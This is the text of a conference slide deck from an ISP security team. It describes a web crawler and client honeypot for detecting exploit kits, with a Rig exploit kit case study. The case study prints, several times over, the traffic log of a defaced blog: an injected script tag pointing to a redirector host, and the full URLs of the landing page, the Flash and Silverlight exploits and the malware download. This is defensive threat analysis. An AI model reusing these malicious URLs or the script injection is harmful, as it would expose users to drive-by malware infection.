Web crawler system for collecting malicious activities FIRST TC - - PowerPoint PPT Presentation

web crawler system for
SMART_READER_LITE
LIVE PREVIEW

Web crawler system for collecting malicious activities FIRST TC - - PowerPoint PPT Presentation

Web crawler system for collecting malicious activities FIRST TC Mauritius 2016 Hisao Nashiwa Internet Initiative Japan Inc. Who am I? Threat analyst at Internet Initiative Japan Inc. that is short for IIJ. IIJ is a Japanese


slide-1
SLIDE 1

Web crawler system for collecting malicious activities

FIRST TC Mauritius 2016 Hisao Nashiwa Internet Initiative Japan Inc.

slide-2
SLIDE 2

Who am I?

  • Threat analyst at “Internet Initiative Japan Inc.”

that is short for “IIJ”.

– IIJ is a Japanese ISP (We are the first commercial ISP in Japan).

  • Member of CSIRT team called “IIJ-SECT”

– Our jobs include…

  • Malware Analysis
  • Forensic Investigation
  • Incident Response and Handling
  • Developing and operating honeypot and web crawler

system

  • Surveying malware and attacking technique trends
  • Writing reports for our quarterly

report (called “IIR”) and blogs

Hisao Nashiwa CISSP

slide-3
SLIDE 3

Motivation

  • Recent typical malware infection vectors are

drive-by download and malware-attached email.

  • We want to observe web-based threat trend,

especially, Exploit kit activities.

  • For the reason, we should crawl large amount
  • f websites(more than 300,000 sites/day) for

Japanese user and detect threat.

slide-4
SLIDE 4

Issues

  • Simple web crawling tools do not implement

DOM parser act as Internet Explorer.

– wget, curl, even spidermonkey and jsunpack-n can’t process JavaScript contents made for Internet Explorer. – thug has DOM parser, but it’s not the same as Internet Explorer’s one.

  • Several sandbox products can parse DOM with

real Internet Explorer on Windows VM. But these take a long time for analysis. (5-15min/website).

slide-5
SLIDE 5

Solution

  • We made in-house light-weight sandbox that

runs real Internet Explorer on Windows VM for crawling websites.(in other words, web client honeypot)

– That takes 15-60 sec/website for light-weight analysis.

  • We adopt customized proxy server to analyze

the crawling traffic.

slide-6
SLIDE 6

(1) Controller order the target website. (2) Client honeypot crawl the website through the proxy. Then it analyzes traffic and VM activity. – phase 1 analysis (3) If some suspicious activities detected in phase 1 analysis, another sandbox product crawl the same website to deep analysis(takes several minutes) (4) Controller collect sandbox report and the phase1 analysis result, then do phase2 analysis to classify the threat.

Web crawler system

Redirection Detector/Analyzer Redirection Detector/Analyzer

Flow and Components

Light weight sandbox (client honeypot)

Custom MITM Proxy

Honey Clients Honey Clients

Windows VM Sandbox product

The internet

Phase1 analyzer

Mgmt server

Controller/ DB Phase2 analyzer

(1) (2) (2) (3) (4)

slide-7
SLIDE 7

Details of analysis

  • Phase1 analysis

– HTTP header info

  • FQDN length, destination port number, domain transitions, User-

agent, content-type, header length, response size and so on...

– Simple content analysis

  • File magic checking (PE, ZIP(jar, xap) and PDF are suspicious)
  • reversing action scripts of swf contents by swf dumping tool and grep

some suspicious sentence(like XOR order).

– Windows VM activity

  • Sysmon log, RAM usage, Java related process..
  • Flash trace log

These analyses apply for all session(takes 15-60 sec/website)

slide-8
SLIDE 8

Details of analysis(cont.)

  • Sandbox analysis

– We use commercial sandbox product to automated analysis.

This analysis apply for 0.1 percent of all session(takes 5-15 min/website)

slide-9
SLIDE 9

Details of analysis(cont.)

  • Phase 2 analysis

– Analyze the results of phase 1 analysis and report of sandbox product. – Classify the threat and identify the name of Exploit kit by our in-house pattern match signatures. – The false positive rate of pattern matching is modestly low because this analysis apply only sessions raised by phase 1 analysis.

This analysis apply for 0.1 percent of all session(takes several sec/website)

slide-10
SLIDE 10

Websites to crawl

  • We’re crawling about 400,000 websites/day.

– .jp domain websites from Alexa top 1 million (automatic collection) – public offices, local governments, listed companies, media companies…(manual collection)

  • Googling for the lists then parse the lists… very tired.

– Hot websites from keywords of search engines (automatic collection)

slide-11
SLIDE 11

Recent observations

Encounter rate of Exploit kit threat in Japan

0.001 0.002 0.003 0.004 0.005 0.006 0.007 0.008 0.009 1-Jul-16 1-Aug-16 1-Sep-16 (encount rate(%)) (date) Sundown KaiXin Rig Neutrino

slide-12
SLIDE 12

Recent activities of Rig exploit kit

20 40 60 80 100 29-Sep-16 4-Oct-16 9-Oct-16 14-Oct-16 (date)

Number of defaced websites redirect to Rig EK

slide-13
SLIDE 13
  • The pandemic of Rig EK is worldwide trend.
  • Heavily obfuscated Landing page.
  • Exploit Internet Explorer, Adobe Flash and Silverlight.
  • We observed Locky, Cerber and Ursnif as exploit payload.

Rig Exploit kit

slide-14
SLIDE 14

Case: a certain blog defaced and redirected visitors to Rig EK

http://blogs.XXXXX.com @Mar-2016

slide-15
SLIDE 15

Case: a certain blog defaced and redirected visitors to Rig EK(Cont.)

  • 1. GET http://blogs.XXXXX.com/ HTTP/1.1 200 0 25833 text/html
  • 2. GET http://blogs.XXXXX.com/wp-includes/js/wp-emoji-release.min.js HTTP/1.1 200 0 6519 application/javascript
  • 3. GET http://xc.rottencouchtomatoes.com/hlfvviewforumym.php HTTP/1.1 200 0 901 text/javascript
  • 4. GET http://ef.scber.com/?wXqBcrWVLRbJCII=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-
  • fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxh

PU6WJVyO1MAwlB4AwSzqrJBKqE HTTP/1.1 200 0 5254 text/html

  • 5. GET http://ef.scber.com/index.php?wXqBcrWVLRbJCII=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-
  • fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxh

PU6WJVyO1MAwlB4AwSzqrJBKqKp0N6RgBnEB_CbJQlqw-BF3H6PXl5gv2pHn4oieWX_P93mpMmmA HTTP/1.1 200 0 14779 application/x-shockwave-flash

  • 6. GET http://ef.scber.com/index.php?wXqBcrWVLRbJCII=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-
  • fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxh

PU6WJVyO1MAwlB4AwSzqrJBKqKp0N6RgBnEB_CbJQlqw-KAWf6PXl5gv2pHn4oieWX_PR3lJImmA HTTP/1.1 200 0 13938 application/x-silverlight-app

  • 7. GET http://ef.scber.com/index.php?wXqBcrWVLRbJCII=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-
  • fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxh

PU6WJVyO1MAwlB4AwSzqrJBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PJwnJAmmA&dfsdf=11010 HTTP/1.1 200 0 323584 application/x-msdownload

Compromised webpage Redirector Infector

slide-16
SLIDE 16

Case: a certain blog defaced and redirected visitors to Rig EK(Cont.)

  • 1. GET http://blogs.XXXXX.com/ HTTP/1.1 200 0 25833 text/html
  • 2. GET http://blogs.XXXXX.com/wp-includes/js/wp-emoji-release.min.js HTTP/1.1 200 0 6519 application/javascript
  • 3. GET http://xc.rottencouchtomatoes.com/hlfvviewforumym.php HTTP/1.1 200 0 901 text/javascript
  • 4. GET http://ef.scber.com/?wXqBcrWVLRbJCII=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-
  • fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxh

PU6WJVyO1MAwlB4AwSzqrJBKqE HTTP/1.1 200 0 5254 text/html

  • 5. GET http://ef.scber.com/index.php?wXqBcrWVLRbJCII=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-
  • fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxh

PU6WJVyO1MAwlB4AwSzqrJBKqKp0N6RgBnEB_CbJQlqw-BF3H6PXl5gv2pHn4oieWX_P93mpMmmA HTTP/1.1 200 0 14779 application/x-shockwave-flash

  • 6. GET http://ef.scber.com/index.php?wXqBcrWVLRbJCII=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-
  • fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxh

PU6WJVyO1MAwlB4AwSzqrJBKqKp0N6RgBnEB_CbJQlqw-KAWf6PXl5gv2pHn4oieWX_PR3lJImmA HTTP/1.1 200 0 13938 application/x-silverlight-app

  • 7. GET http://ef.scber.com/index.php?wXqBcrWVLRbJCII=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-
  • fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxh

PU6WJVyO1MAwlB4AwSzqrJBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PJwnJAmmA&dfsdf=11010 HTTP/1.1 200 0 323584 application/x-msdownload

slide-17
SLIDE 17

Case: a certain blog defaced and redirected visitors to Rig EK(Cont.)

  • 1. GET http://blogs.XXXXX.com/ HTTP/1.1 200 0 25833 text/html
  • 2. GET http://blogs.XXXXX.com/wp-includes/js/wp-emoji-release.min.js HTTP/1.1 200 0 6519 application/javascript
  • 3. GET http://xc.rottencouchtomatoes.com/hlfvviewforumym.php HTTP/1.1 200 0 901 text/javascript
  • 4. GET http://ef.scber.com/?wXqBcrWVLRbJCII=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-
  • fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxh

PU6WJVyO1MAwlB4AwSzqrJBKqE HTTP/1.1 200 0 5254 text/html

  • 5. GET http://ef.scber.com/index.php?wXqBcrWVLRbJCII=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-
  • fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxh

PU6WJVyO1MAwlB4AwSzqrJBKqKp0N6RgBnEB_CbJQlqw-BF3H6PXl5gv2pHn4oieWX_P93mpMmmA HTTP/1.1 200 0 14779 application/x-shockwave-flash

  • 6. GET http://ef.scber.com/index.php?wXqBcrWVLRbJCII=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-
  • fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxh

PU6WJVyO1MAwlB4AwSzqrJBKqKp0N6RgBnEB_CbJQlqw-KAWf6PXl5gv2pHn4oieWX_PR3lJImmA HTTP/1.1 200 0 13938 application/x-silverlight-app

  • 7. GET http://ef.scber.com/index.php?wXqBcrWVLRbJCII=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-
  • fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxh

PU6WJVyO1MAwlB4AwSzqrJBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PJwnJAmmA&dfsdf=11010 HTTP/1.1 200 0 323584 application/x-msdownload

SCRIPT src = "http://xc.rottencouchtomatoes.com/hlfvviewforumym.php"

slide-18
SLIDE 18

Case: a certain blog defaced and redirected visitors to Rig EK(Cont.)

  • 1. GET http://blogs.XXXXX.com/ HTTP/1.1 200 0 25833 text/html
  • 2. GET http://blogs.XXXXX.com/wp-includes/js/wp-emoji-release.min.js HTTP/1.1 200 0 6519 application/javascript
  • 3. GET http://xc.rottencouchtomatoes.com/hlfvviewforumym.php HTTP/1.1 200 0 901 text/javascript
  • 4. GET http://ef.scber.com/?wXqBcrWVLRbJCII=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-
  • fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxh

PU6WJVyO1MAwlB4AwSzqrJBKqE HTTP/1.1 200 0 5254 text/html

  • 5. GET http://ef.scber.com/index.php?wXqBcrWVLRbJCII=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-
  • fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxh

PU6WJVyO1MAwlB4AwSzqrJBKqKp0N6RgBnEB_CbJQlqw-BF3H6PXl5gv2pHn4oieWX_P93mpMmmA HTTP/1.1 200 0 14779 application/x-shockwave-flash

  • 6. GET http://ef.scber.com/index.php?wXqBcrWVLRbJCII=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-
  • fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxh

PU6WJVyO1MAwlB4AwSzqrJBKqKp0N6RgBnEB_CbJQlqw-KAWf6PXl5gv2pHn4oieWX_PR3lJImmA HTTP/1.1 200 0 13938 application/x-silverlight-app

  • 7. GET http://ef.scber.com/index.php?wXqBcrWVLRbJCII=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-
  • fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxh

PU6WJVyO1MAwlB4AwSzqrJBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PJwnJAmmA&dfsdf=11010 HTTP/1.1 200 0 323584 application/x-msdownload

slide-19
SLIDE 19

Case: a certain blog defaced and redirected visitors to Rig EK(Cont.)

  • 1. GET http://blogs.XXXXX.com/ HTTP/1.1 200 0 25833 text/html
  • 2. GET http://blogs.XXXXX.com/wp-includes/js/wp-emoji-release.min.js HTTP/1.1 200 0 6519 application/javascript
  • 3. GET http://xc.rottencouchtomatoes.com/hlfvviewforumym.php HTTP/1.1 200 0 901 text/javascript
  • 4. GET http://ef.scber.com/?wXqBcrWVLRbJCII=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-
  • fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxh

PU6WJVyO1MAwlB4AwSzqrJBKqE HTTP/1.1 200 0 5254 text/html

  • 5. GET http://ef.scber.com/index.php?wXqBcrWVLRbJCII=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-
  • fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxh

PU6WJVyO1MAwlB4AwSzqrJBKqKp0N6RgBnEB_CbJQlqw-BF3H6PXl5gv2pHn4oieWX_P93mpMmmA HTTP/1.1 200 0 14779 application/x-shockwave-flash

  • 6. GET http://ef.scber.com/index.php?wXqBcrWVLRbJCII=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-
  • fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxh

PU6WJVyO1MAwlB4AwSzqrJBKqKp0N6RgBnEB_CbJQlqw-KAWf6PXl5gv2pHn4oieWX_PR3lJImmA HTTP/1.1 200 0 13938 application/x-silverlight-app

  • 7. GET http://ef.scber.com/index.php?wXqBcrWVLRbJCII=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-
  • fSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZWSELQy2AnyyuAUI5kvxh

PU6WJVyO1MAwlB4AwSzqrJBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PJwnJAmmA&dfsdf=11010 HTTP/1.1 200 0 323584 application/x-msdownload

Landing page Flash exploit Silverlight exploit Payload = malware!!

slide-20
SLIDE 20

Case: a certain blog defaced and redirected visitors to Rig EK(Cont.)

Landing page

slide-21
SLIDE 21

Case: a certain blog defaced and redirected visitors to Rig EK(Cont.)

Flash Exploit

slide-22
SLIDE 22

Case: a certain blog defaced and redirected visitors to Rig EK(Cont.)

Silverlight Exploit

slide-23
SLIDE 23

Case: a certain blog defaced and redirected visitors to Rig EK(Cont.)

Ursnif as encoded payload

slide-24
SLIDE 24

Thank you.